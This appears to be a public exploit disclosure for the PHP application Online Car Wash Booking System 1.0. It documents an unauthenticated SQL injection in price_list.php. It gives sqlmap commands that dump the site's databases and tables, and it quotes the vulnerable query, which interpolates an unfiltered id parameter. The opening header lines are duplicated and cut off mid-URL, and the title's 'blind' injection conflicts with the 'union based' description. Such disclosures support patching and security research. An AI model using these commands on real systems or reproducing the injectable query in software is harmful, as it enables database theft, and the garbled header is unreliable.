# Exploit Author: segf0lt
# Date: April 14, 2022
# Vendor Homepage: https://www.sourcecodester. # Exploit Title: Online Car Wash Booking System 1.0 - Unauthenticated blind SQL Injection
# Exploit Author: segf0lt
# Date: April 14, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ocwbs_0.zip
# Tested on: Ubuntu, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Online Car Wash Booking System 1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a union based SQL Injection attack.
# Exploit
* Exploit with Sqlmap
sqlmap -u "http://localhost/ocwbs/services/price_list.php?id=3" --dbms=mysql -dbs
sqlmap -u "http://localhost/ocwbs/services/price_list.php?id=3" --tables -D ocwbs_db
# Vulnerable Code
* No filter `id` when inserting data to database of price_list.php webpage
if(isset($id)){
$price_list = $conn->query("SELECT * FROM `price_list` where service_id = '{$id}'");
$price_arr = array_column($price_list->fetch_all(MYSQLI_ASSOC),'price', 'vehicle_id');
}